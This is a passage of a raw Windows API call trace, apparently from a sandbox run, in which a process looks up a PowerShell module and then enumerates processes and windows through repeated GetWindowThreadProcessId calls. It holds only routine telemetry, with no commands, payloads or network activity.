GetModuleInformation (in: hProcess=0x310, hModule=0x224a0000, lpmodinfo=0x2a97a0c, cb=0xc | out: lpmodinfo=0x2a97a0c*(lpBaseOfDll=0x224a0000, SizeOfImage=0x72000, EntryPoint=0x224a7363)) returned 1 [0046.813] GetLastError () returned 0x0 [0046.815] GetModuleBaseNameW (in: hProcess=0x310, hModule=0x224a0000, lpBaseName=0x247ac0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0046.815] GetLastError () returned 0x0 [0046.816] GetModuleFileNameExW (in: hProcess=0x310, hModule=0x224a0000, lpFilename=0x247ac0, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0046.816] GetLastError () returned 0x0 [0046.817] CloseHandle (hObject=0x310) returned 1 [0046.817] GetLastError () returned 0x0 [0046.820] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x3b4) returned 0x310 [0046.820] GetLastError () returned 0x0 [0046.821] GetExitCodeProcess (in: hProcess=0x310, lpExitCode=0x2a96ebc | out: lpExitCode=0x2a96ebc*=0x103) returned 1 [0046.821] GetLastError () returned 0x0 [0046.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3a95278, Length=0x20000, ResultLength=0x19e9fc | out: SystemInformation=0x3a95278, ResultLength=0x19e9fc*=0xd908) returned 0x0 [0046.853] EnumWindows (lpEnumFunc=0x2853612, lParam=0x0) returned 1 [0046.855] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x538 [0046.855] GetLastError () returned 0x0 [0046.855] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.855] GetLastError () returned 0x0 [0046.855] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.855] GetLastError () returned 0x0 [0046.855] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.855] GetLastError () returned 0x0 [0046.855] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x514 [0046.855] GetLastError () returned 0x0 [0046.855] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.855] GetLastError () returned 0x0 [0046.856] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x778 [0046.856] GetLastError () returned 0x0 [0046.856] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x778 [0046.856] GetLastError () returned 0x0 [0046.856] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.856] GetLastError () returned 0x0 [0046.856] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.856] GetLastError () returned 0x0 [0046.856] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.856] GetLastError () returned 0x0 [0046.856] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.856] GetLastError () returned 0x0 [0046.856] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.856] GetLastError () returned 0x0 [0046.856] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.857] GetLastError () returned 0x0 [0046.857] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.857] GetLastError () returned 0x0 [0046.857] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.857] GetLastError () returned 0x0 [0046.857] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.857] GetLastError () returned 0x0 [0046.857] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x458 [0046.857] GetLastError () returned 0x0 [0046.857] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.857] GetLastError () returned 0x0 [0046.857] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.857] GetLastError () returned 0x0 [0046.857] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9e0 [0046.857] GetLastError () returned 0x0 [0046.858] GetWindowThreadProcessId (in: hWnd=0x3015c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8f8 [0046.858] GetLastError () returned 0x0 [0046.858] GetWindowThreadProcessId (in: hWnd=0x40162, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8f8 [0046.858] GetLastError () returned 0x0 [0046.858] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8f8 [0046.858] GetLastError () returned 0x0 [0046.858] GetWindowThreadProcessId (in: hWnd=0x40160, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x6f4 [0046.858] GetLastError () returned 0x0 [0046.858] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.858] GetLastError () returned 0x0 [0046.858] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.858] GetLastError () returned 0x0 [0046.858] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.858] GetLastError () returned 0x0 [0046.859] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.859] GetLastError () returned 0x0 [0046.860] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.860] GetLastError () returned 0x0 [0046.861] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.861] GetLastError () returned 0x0 [0046.861] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.861] GetLastError () returned 0x0 [0046.861] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.861] GetLastError () returned 0x0 [0046.861] GetWindowThreadProcessId (in: hWnd=0x1025c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9d0 [0046.861] GetLastError () returned 0x0 [0046.861] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9c0 [0046.861] GetLastError () returned 0x0 [0046.861] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9b0 [0046.861] GetLastError () returned 0x0 [0046.861] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9a0 [0046.861] GetLastError () returned 0x0 [0046.861] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x990 [0046.862] GetLastError () returned 0x0 [0046.862] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x980 [0046.862] GetLastError () returned 0x0 [0046.862] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x970 [0046.862] GetLastError () returned 0x0 [0046.862] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x960 [0046.862] GetLastError () returned 0x0 [0046.862] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x950 [0046.862] GetLastError () returned 0x0 [0046.862] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x940 [0046.862] GetLastError () returned 0x0 [0046.862] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x930 [0046.862] GetLastError () returned 0x0 [0046.863] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x920 [0046.863] GetLastError () returned 0x0 [0046.863] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x910 [0046.863] GetLastError () returned 0x0 [0046.863] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x900 [0046.863] GetLastError () returned 0x0 [0046.863] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8f0 [0046.863] GetLastError () returned 0x0 [0046.863] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8e0 [0046.863] GetLastError () returned 0x0 [0046.863] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8d0 [0046.863] GetLastError () returned 0x0 [0046.863] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8c0 [0046.863] GetLastError () returned 0x0 [0046.864] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8b0 [0046.864] GetLastError () returned 0x0 [0046.864] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8a0 [0046.864] GetLastError () returned 0x0 [0046.864] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x890 [0046.864] GetLastError () returned 0x0 [0046.864] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x880 [0046.864] GetLastError () returned 0x0 [0046.864] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x870 [0046.864] GetLastError () returned 0x0 [0046.864] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x860 [0046.864] GetLastError () returned 0x0 [0046.864] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x850 [0046.864] GetLastError () returned 0x0 [0046.865] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x840 [0046.865] GetLastError () returned 0x0 [0046.865] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x830 [0046.865] GetLastError () returned 0x0 [0046.865] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x820 [0046.865] GetLastError () returned 0x0 [0046.865] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x810 [0046.865] GetLastError () returned 0x0 [0046.865] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x20c [0046.865] GetLastError () returned 0x0 [0046.865] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x5d8 [0046.865] GetLastError () returned 0x0 [0046.865] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4fc [0046.866] GetLastError () returned 0x0 [0046.866] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4e4 [0046.866] GetLastError () returned 0x0 [0046.866] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7a0 [0046.866] GetLastError () returned 0x0 [0046.866] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7c8 [0046.866] GetLastError () returned 0x0 [0046.866] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x208 [0046.866] GetLastError () returned 0x0 [0046.866] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x540 [0046.866] GetLastError () returned 0x0 [0046.866] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x78c [0046.866] GetLastError () returned 0x0 [0046.866] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x670 [0046.867] GetLastError () returned 0x0 [0046.867] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x620 [0046.867] GetLastError () returned 0x0 [0046.867] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x738 [0046.867] GetLastError () returned 0x0 [0046.867] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x700 [0046.867] GetLastError () returned 0x0 [0046.867] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x248 [0046.867] GetLastError () returned 0x0 [0046.867] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x570 [0046.867] GetLastError () returned 0x0 [0046.867] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7f4 [0046.867] GetLastError () returned 0x0 [0046.867] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x644 [0046.867] GetLastError () returned 0x0 [0046.867] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x54c [0046.868] GetLastError () returned 0x0 [0046.868] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x634 [0046.868] GetLastError () returned 0x0 [0046.868] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x5cc [0046.868] GetLastError () returned 0x0 [0046.868] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x418 [0046.868] GetLastError () returned 0x0 [0046.868] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7a4 [0046.868] GetLastError () returned 0x0 [0046.868] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x484 [0046.868] GetLastError () returned 0x0 [0046.868] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x5d4 [0046.868] GetLastError () returned 0x0 [0046.868] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x5dc [0046.868] GetLastError () returned 0x0 [0046.868] GetWindowThreadProcessId (in: hWnd=0x20180, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7d0 [0046.868] GetLastError () returned 0x0 [0046.868] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x240 [0046.869] GetLastError () returned 0x0 [0046.869] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x560 [0046.869] GetLastError () returned 0x0 [0046.869] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x564 [0046.869] GetLastError () returned 0x0 [0046.869] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7a8 [0046.869] GetLastError () returned 0x0 [0046.869] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x434 [0046.869] GetLastError () returned 0x0 [0046.869] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x71c [0046.869] GetLastError () returned 0x0 [0046.869] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x67c [0046.869] GetLastError () returned 0x0 [0046.869] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4f0 [0046.869] GetLastError () returned 0x0 [0046.869] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x514 [0046.869] GetLastError () returned 0x0 [0046.869] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x50c [0046.869] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x514 [0046.870] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x50c [0046.870] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x514 [0046.870] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4f0 [0046.870] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4f0 [0046.870] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x58c [0046.870] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x578 [0046.870] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x458 [0046.870] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x530 [0046.870] GetLastError () returned 0x0 [0046.870] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.870] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x508 [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4f4 [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x794 [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x458 [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x458 [0046.871] GetLastError () returned 0x0 [0046.871] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x448 [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x778 [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x458 [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x538 [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4ac [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9e0 [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x50114, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8f8 [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x6f4 [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9d0 [0046.872] GetLastError () returned 0x0 [0046.872] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9c0 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9b0 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x9a0 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x990 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x980 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x970 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x960 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x950 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x940 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x930 [0046.873] GetLastError () returned 0x0 [0046.873] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x920 [0046.873] GetLastError () returned 0x0 [0046.874] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x910 [0046.874] GetLastError () returned 0x0 [0046.874] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x900 [0046.874] GetLastError () returned 0x0 [0046.874] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8f0 [0046.874] GetLastError () returned 0x0 [0046.874] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8e0 [0046.874] GetLastError () returned 0x0 [0046.874] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8d0 [0046.874] GetLastError () returned 0x0 [0046.874] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8c0 [0046.874] GetLastError () returned 0x0 [0046.874] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8b0 [0046.874] GetLastError () returned 0x0 [0046.874] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x8a0 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x890 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x880 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x870 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x860 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x850 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x840 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x830 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x820 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x19e650 | out: 